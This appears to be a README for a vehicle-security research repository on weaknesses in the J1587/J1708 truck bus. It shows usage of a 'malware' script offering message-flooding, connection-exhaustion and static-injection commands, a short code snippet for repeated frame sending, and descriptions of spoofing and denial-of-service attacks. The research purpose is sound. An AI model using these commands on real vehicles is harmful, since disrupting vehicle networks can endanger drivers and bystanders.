The J1587 protocol, similar to the J1939 protocol, is unencrypted and lacks robust security features, making it susceptible to various attacks. This repository provides insights into the vulnerabilities associated with J1587/J1708 and suggests possible mitigations that would enhance the security of trailer communications, or other legacy devices that still use these protocols.
Previous work on J1587/J1708 vulnerabilities has been limited, with most research focusing on the J1939 protocol. However, as many legacy systems still rely on J1587/J1708 for communication, it is crucial to understand and address the vulnerabilities present in these protocols and shown under the literature directory. We aim to fill this gap by providing a comprehensive overview of the vulnerabilities in J1587/J1708 and demonstrating practical examples of attacks and mitigations, especially within the transport layer.
The DG Diagnostics Adapter is a hardware device that connects to the vehicle's diagnostic port and allows for communication with the J1587/J1708 bus. It uses RP1210 DLLs to interface with the bus, enabling the sending and receiving of messages. The adapter is essential for testing and demonstrating vulnerabilities in J1587/J1708 communications. More information about the DG Diagnostics Adapter can be found at DG Diagnostics.
The j1708-rp1210.py script is a Python implementation that interacts with the J1708 bus using RP1210 DLLs. It allows for sending and receiving messages on the J1708 bus, making it a useful tool developed mainly for dumping J1708/J1587 messages and evaluating the bus's behavior under different conditions. The script can be found here under the scripts directory.
Example usage:
python32 .\j1708-rp1210.py --api DGDPAXL --pretty --log ..\hv_legacy_vulnerabilities\j1587DoS\DTDSC-6067MK60\normal-tp-traffic-config-rp1210.log --metadata
This script was developed for research evaluations on the J1587 bus and should only be used in that setting.
To use the script, you must be on a py-hv-network compatible device (see TruckCape below):
python3 j1587malware.py -h
usage: j1587malware.py [-h] --cmd CMD ...
J1708/J1587 Malware Script for TruckCape
positional arguments:
args Arguments for the command
optional arguments:
-h, --help show this help message and exit
--cmd CMD Command to executeThe currently available commands are:
python3 j1587malware.py --cmd request-overload
Usage: request-overload <target-mid> <attacking-mid> <count> <interval> <data>python3 j1587malware.py --cmd static
Usage: static <count> <interval> <frame>python3 j1587malware.py --cmd connection-exhaustion
Usage: connection-exhaustion <target-mid> <attacking-mid> <count> <interval> <data>To add more commands to the J1587 malware script, simply register it in the script's command registry.
For example:
@register_command('static')
def static(args):
'''Sends a static message to the target ECU
'''
if len(args) < 3:
print("Usage: static <count> <interval> <frame1> [Optional <frame2> <frameN> ... ]")
return
count = int(args[0])
interval = float(args[1])
frames = args[2:]
for frame in frames:
print(f"[*] Sending J1587 message: {frame} {count} times, every {interval} seconds.")
for _ in range(count):
driver.send_message(bytes.fromhex(frame))
time.sleep(interval)The TruckCape is a hardware device that provides an interface for J1708 communications. It's an asset because it doesn't necessarily follow the J1708 standard for timing, which allows us to break the J1708 protocol and send messages at a higher rate than the standard allows. This can be used to demonstrate vulnerabilities such as Denial of Service (DoS) attacks on the J1708 bus. More information about the TruckCape can be found here.
The Pretty J1587 tool is a Python script that formats J1587 messages for easier readability. It can be used to analyze and interpret J1587 messages captured from the bus, making it easier to understand the communication patterns. The script can be found here.
The Saleae Logic Analyzer is a hardware device used to capture and analyze digital signals. It can be used to monitor J1587/J1708 communications, allowing for the observation of message timing, content, and bus behavior during attacks or normal operations. More information about the Saleae Logic Analyzer can be found at here.
Attackers can send false messages to the vehicle's electronic control unit (ECU), potentially leading to incorrect readings or actions by the vehicle or other nodes on the bus. This can include sending false diagnostic messages or altering vehicle parameters. Our example shown under spoofing shows how an attacker can inject false Battery Voltage messages into the bus, which changes the diagnostic adapter's (DGDPAXL) readings and displays an incorrect battery voltage. The implications of this attack can range from misleading diagnostics to potentially dangerous vehicle operations (e.g., altering speed or braking parameters).
An attacker can flood the J1708 bus with excessive messages, overwhelming the system and preventing legitimate messages from being processed. This can disrupt vehicle operations and lead to safety issues. The standard specifies a BAT (Bus Access Time) of 10 bit times + (2 * Priority) for message transmission, which can be exploited by sending messages at a high rate to saturate the bus. The implications of this attack can include loss of control over vehicle functions, delayed responses to critical events, and potential safety hazards for both the vehicle and its surroundings (e.g., lost control of braking). An example of this attack can be found under j1708DoS.